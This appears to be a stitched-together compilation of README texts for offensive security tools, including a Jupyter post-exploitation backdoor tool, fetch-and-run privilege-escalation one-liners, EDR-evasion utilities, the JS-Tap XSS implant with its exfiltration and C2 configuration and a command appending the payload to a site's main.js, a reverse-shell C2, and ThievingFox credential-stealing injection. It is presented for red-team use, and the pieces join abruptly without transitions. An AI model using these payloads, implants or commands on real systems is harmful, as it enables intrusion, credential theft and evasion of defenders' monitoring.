If you need to record the sniffed traffic, use the `--output` argument:
caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap
If you interrupt the tool with CTRL+C, the traffic is still written to the file
If you already have some recorded traffic, you can use the `--input` argument to look for potential security issues:
caster@kali:~$ above --input ospf-md5.cap
Example:
caster@kali:~$ sudo above --input ospf-md5.cap
[+] Analyzing pcap file...
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
The tool can detect hosts without noise in the air by processing ARP frames in passive mode
caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10
[+] Host discovery using Passive ARP
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------
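Conceptually, passive ARP host discovery is just listening for ARP replies without ever transmitting. A minimal Scapy sketch of the idea (not Above's actual code; the interface name and timeout are assumptions) looks like this:

```python
from scapy.all import ARP, sniff

def handle(pkt):
    # op == 2 is an ARP reply ("is-at"); record the advertised IP/MAC pair.
    if pkt.haslayer(ARP) and pkt[ARP].op == 2:
        print("[+] Detected ARP Reply")
        print(f"[*] ARP Reply for IP: {pkt[ARP].psrc}")
        print(f"[*] MAC Address: {pkt[ARP].hwsrc}")

# Purely passive: listen only, never transmit (requires root).
sniff(iface="eth0", filter="arp", prn=handle, store=False, timeout=10)
```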
I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.
V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.
pip install vger
vger --help
Currently, `vger interactive` has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by name in non-interactive format with `vger <module>`. List available modules with `vger --help`.
Once a connection is established, users drop into a nested set of menus.
The top level menu is:
- Reset: Configure a different host.
- Enumerate: Utilities to learn more about the host.
- Exploit: Utilities to perform direct action and manipulation of the host and artifacts.
- Persist: Utilities to establish persistence mechanisms.
- Export: Save output to a text file.
- Quit: No one likes quitters.
These menus contain the following functionality:
- List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code.
- Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local `.py` file. Either input is processed as a string and executed in the runtime of the notebook.
- Backdoor: Launch a new JupyterLab instance open to `0.0.0.0`, with `allow-root`, on a user-specified `port` with a user-specified `password`.
- Check History: See ipython commands recently run in the target notebook.
- Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal.
- List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with `/`.
- Upload file: Upload a file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension.
- Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory).
- Find models: Find models based on common file formats.
- Download models: Download discovered models.
- Snoop: Monitor notebook execution and results until timeout.
- Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.
With `pip install vger[ai]` you'll get LLM-generated summaries of notebooks in the target environment. These are meant to be a rough translation for non-DS/AI folks to quickly triage whether (or which) notebooks are worth investigating further.
There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").
First, a couple of useful oneliners ;)
wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh
Note that since version `2.10` you can serve the script to other hosts with the `-S` flag!
Linux enumeration tools for pentesting and CTFs
This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.
Unlike LinEnum, `lse` tries to gradually expose the information depending on its importance from a privesc point of view.
This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.
From version 2.0 it is mostly POSIX compliant and tested with `shellcheck` and `posh`.
It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests, so you save some time. By default it monitors for 1 minute, but you can choose the watch time with the `-p` parameter.
It has 3 levels of verbosity so you can control how much information you see.
In the default level you should see the highly important security flaws in the system. Level `1` (`./lse.sh -l1`) shows interesting information that should help you to privesc. Level `2` (`./lse.sh -l2`) will just dump all the information it gathers about the system.
By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.
The idea is to get the information gradually.
First you should execute it just like `./lse.sh`. If you see some green `yes!`, you probably already have some good stuff to work with.
If not, you should try the level `1` verbosity with `./lse.sh -l1` and you will see some more information that can be interesting.
If that does not help, level `2` will just dump everything you can gather about the service using `./lse.sh -l2`. In this case you might find it useful to use `./lse.sh -l2 | less -r`.
You can also select which tests to execute by passing the `-s` parameter. With it you can select specific tests or sections to be executed. For example, `./lse.sh -l2 -s usr010,net,pro` will execute the test `usr010` and all the tests in the sections `net` and `pro`.
Use: ./lse.sh [options]
OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurrent tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.
Also available in webm video
Direct execution oneliners
bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i
LOLSpoof is an interactive shell program that automatically spoofs the command line arguments of the spawned process. Just call your incriminating-looking command line LOLBin (e.g. `powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....`) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.
Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.
lolbin.exe " " * sizeof(real arguments)
Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry:
1. Creation of suspended process
2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead)
3. Write to the spawned process with WriteProcessMemory
Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)
nimble install winim
Programs that clear or change the previously printed console messages (such as timeout.exe 10) break the program. When such commands are employed, you'll need to restart the console. I don't know how to fix that yet; suggestions are welcome.
BadExclusionsNWBO is an evolution of BadExclusions to identify custom or undocumented folder exclusions on AV/EDR products.
BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe in the same folder as BadExclusionsNWBO.exe.
Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or fewer, the folder has an exclusion; otherwise, the folder is not excluded.
Since the release of BadExclusions I've been thinking about how to achieve the same results without creating as much noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.
If you download Probatorum-EDR-Userland-Hook-Checker and run it inside a regular folder and in a folder with a specific type of exclusion, you will notice a huge difference. All the information is in the Probatorum repository.
Each vendor applies exclusions in a different way. In order to get the list of folder exclusions, a specific type of exclusion has to be in place. Not all types of exclusion, and not all vendors, remove the hooks when they exclude a folder.
The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write the Hook_Checker file and get the results.
https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4
JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.
Major changes are documented in the project Announcements:
https://github.com/hoodoer/JS-Tap/discussions/categories/announcements
You can read the original blog post about JS-Tap here:
javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams
Short demo from ShmooCon of JS-Tap version 1:
https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814
Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
https://youtu.be/aWvNLJnqObQ?t=11719
A demo can also be seen in this webinar:
https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um
I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.
JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.
The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.
Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.
The example JS-Tap payload is contained in the telemlib.js file in the payloads directory, however any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using in an engagement strongly consider changing the naming of endpoints, stripping comments, and highly obfuscating the payload.
Make sure you review the configuration section below carefully before using on a publicly exposed server.
Note: ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only Fetch API can be copied currently.
The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.
Trap mode is typically the mode you would use as an XSS payload. Execution of XSS payloads is often fleeting: the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.
Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.
In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.
Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.
Note: I've had good luck using trap mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. the current location). The trap will set when the user visits the login page, and they'll hopefully continue into the authenticated portions of the application inside the iframe trap.
A user refreshing the page will generally break/escape the iframe trap.
Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.
A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.
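As a minimal sketch of that implant approach (the destination path is purely illustrative; pick whichever script the target application already loads on every page):
cat telemlib.js >> /var/www/target-app/static/js/main.js   # append the configured payload to a site-wide script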
Requires Python 3. A large number of dependencies are required for the jsTapServer, so you are highly encouraged to use Python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).
Example:
mkdir jsTapEnvironment
python3 -m venv jsTapEnvironment
source jsTapEnvironment/bin/activate
cd jsTapEnvironment
git clone https://github.com/hoodoer/JS-Tap
cd JS-Tap
pip3 install -r requirements.txt
run in debug/single thread mode:
python3 jsTapServer.py
run with gunicorn multithreaded (production use):
./jstapRun.sh
A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.
If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.
Note that on Mac I also had to install libmagic outside of python.
brew install libmagic
Playing with JS-Tap locally is fine, but to use it in a proper engagement you'll need to be running JS-Tap on a publicly accessible VPS and set up JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.
If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.
For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).
If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.
When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.
The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.
To change the server port configuration see the last line of jsTapServer.py
app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')
Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.
A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavyweight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGINX to also use multiple processes so you don't bottleneck on the proxy itself.
At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;
Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.
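For illustration only, the variables described above might look like this at the top of jstapRun.sh (names are taken from the text above; the actual defaults in the script may differ):
numWorkers=5               # CPUs + 1, per the guidance above
numThreads=4               # 4-8 depending on the processors
PROXYMODE=True             # True when NGINX terminates TLS in front of JS-Tap
DATADIRECTORY=jsTapData/   # note the required trailing '/'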
Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
These configuration variables are in the initGlobals() function.
You need to configure the payload with the URL of the JS-Tap server it will connect back to.
window.taperexfilServer = "https://127.0.0.1:8444";
Set the mode to either trap or implant. This is set with the variable:
window.taperMode = "trap";
or
window.taperMode = "implant";
Only needed for trap mode. See explanation in Operating Modes section above.
Sets the page the user starts on when the iFrame trap is set.
window.taperstartingPage = "http://targetapp.com/somestartpage";
If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:
window.taperstartingPage = window.location.href;
Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of which payload was loaded. Remember that the entire /payloads directory is served; you can have multiple JS-Tap payloads configured with different modes, start pages, and client tags.
This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Set up multiple payloads, each with the appropriate configuration for the application it's being used against, and add a tag indicating which app the client is running.
window.taperTag = 'whatever';
Used to set whether clients check for Custom Payload tasks, and how often they check. The jitter settings let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.
window.taperTaskCheck = true;
window.taperTaskCheckDelay = 5000;
window.taperTaskJitterBottom = -2000;
window.taperTaskJitterTop = 2000;
true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.
window.taperexfilHTML = true;
true/false setting on whether to intercept a copy of all form posts.
window.taperexfilFormSubmissions = true;
Enable monkeypatching of the XHR and Fetch APIs. This works in trap mode; in implant mode, only the Fetch API is monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will rewrite the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Note that jQuery-based network calls will be captured in the XHR API, which jQuery uses under the hood for network calls.
window.monkeyPatchAPIs = true;
By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.
window.postApiCallScreenshot = true;
window.screenshotDelay = 1000;
Login with the admin credentials provided by the server script on startup.
Clients show up on the left, selecting one will show a time series of their events (loot) on the right.
The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.
Each client has an 'x' button (near the star button). This allows you to delete the session for that client; if they're sending junk or useless data, you can prevent that client from submitting future data.
When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issued, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session here.
Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc.) you can add it to the client notes. After you've reviewed all your clients and made your notes, the View All Notes feature at the top allows you to export all notes from all clients at once.
The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.
Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.
[{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]
The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.
In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.
You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.
The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.
To run a payload on a single client, use the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.
A few tools are included in the tools subdirectory.
A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.
At the top of the script is a numClients variable, set to how many clients you want to simulate. The script will spawn a thread for each, retrieve a client session, and send data in, simulating a client.
numClients = 50
You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:
apiServer = "https://127.0.0.1:8444"
JS-Tap run using gunicorn scales quite well.
A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.
Run with:
python3 monkeyPatchLab.py
By default this will start the application running on:
https://127.0.0.1:8443
Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js
function injectPayload()
{
document.head.appendChild(Object.assign(document.createElement('script'),
{src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
}
An abandoned tool, but a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.
You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.
No longer working; this was used before the web UI for JS-Tap existed. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons; most of it is stored in the database, with the exception of exfiltrated HTML code and screenshots.
@hoodoer
hoodoer@bitwisemunitions.dev
The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.
C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.
Reverse shells support:
C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk
Anywhere Access: Reach the C2 Cloud from any location.
Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
TCP Socket: Serving reverse TCP requests for enhanced functionality.
Nginx: Effortlessly routing traffic between web and backend systems.
Redis PubSub: Serving as a robust message broker for seamless communication.
Websockets: Delivering real-time updates to browser clients for enhanced user experience.
Postgres DB: Ensuring persistent storage for seamless continuity.
Reverse TCP port: 8888
Clone the repo
Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.
Distributed under the MIT License. See LICENSE for more information.
Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:
Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.
Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.
Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.
User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.
This project is actively developed, and more features may be added in the future.
The tool only requires Python 3 at the moment.
After cloning the repository to your local machine, you can start the application by executing the command python3 WLA-cli.py. Simple usage example: python3 WLA-cli.py -l LogSampls/access.log -t
Use -h or --help for more detailed usage examples: python3 WLA-cli.py -h
LinkedIn: https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228
ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.
The accompanying blog post can be found here
Rustup must be installed; follow the instructions available here: https://rustup.rs/
The mingw-w64 package must be installed. On Debian, this can be done using:
apt install mingw-w64
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu
Mono and Nuget must also be installed; instructions are available here: https://www.mono-project.com/download/stable/#download-lin
After adding the Mono repositories, Nuget can be installed using apt:
apt install nuget
Finally, Python dependencies must be installed:
pip install -r client/requirements.txt
ThievingFox works with Python >= 3.11.
Rustup must be installed; follow the instructions available here: https://rustup.rs/
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc
A .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development".
Finally, Python dependencies must be installed:
pip install -r client/requirements.txt
ThievingFox works with Python >= 3.11.
NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell).
All modules have been tested on the following Windows versions :
Windows Version |
---|
Windows Server 2022 |
Windows Server 2019 |
Windows Server 2016 |
Windows Server 2012R2 |
Windows 10 |
Windows 11 |
[!CAUTION] Modules have not been tested on other versions, and are expected not to work.
Application | Injection Method |
---|---|
KeePass.exe | AppDomainManager Injection |
KeePassXC.exe | DLL Proxying |
LogonUI.exe (Windows Login Screen) | COM Hijacking |
consent.exe (Windows UAC Popup) | COM Hijacking |
mstsc.exe (Windows default RDP client) | COM Hijacking |
RDCMan.exe (Sysinternals' RDP client) | COM Hijacking |
MobaXTerm.exe (3rd party RDP client) | COM Hijacking |
[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application becoming unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.
ThievingFox contains 3 main modules: poison, cleanup and collect.
For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking.
To speed up the compilation of all libraries, a cache is maintained in client/cache/.
--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).
--keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.
The KeePass module requires the Visual C++ Redistributable to be installed on the target.
Multiple applications can be specified at once, or the --all flag can be used to target all applications.
[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.
$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications
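For instance, a hypothetical run that poisons KeePass and mstsc on a single host could look like this (target, credentials and IP are placeholders following the format shown above):
python3 client/ThievingFox.py poison --keepass --mstsc 'domain/user:password@192.168.1.10'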
For each application specified in the command line parameters, the cleanup module first removes poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.
For applications that support poisoning of both the HKCU and HKCR hives, both are cleaned up regardless.
Multiple applications can be specified at once, or the --all flag can be used to clean up all applications.
It does not clean extracted credentials on the remote host.
[!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.
$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
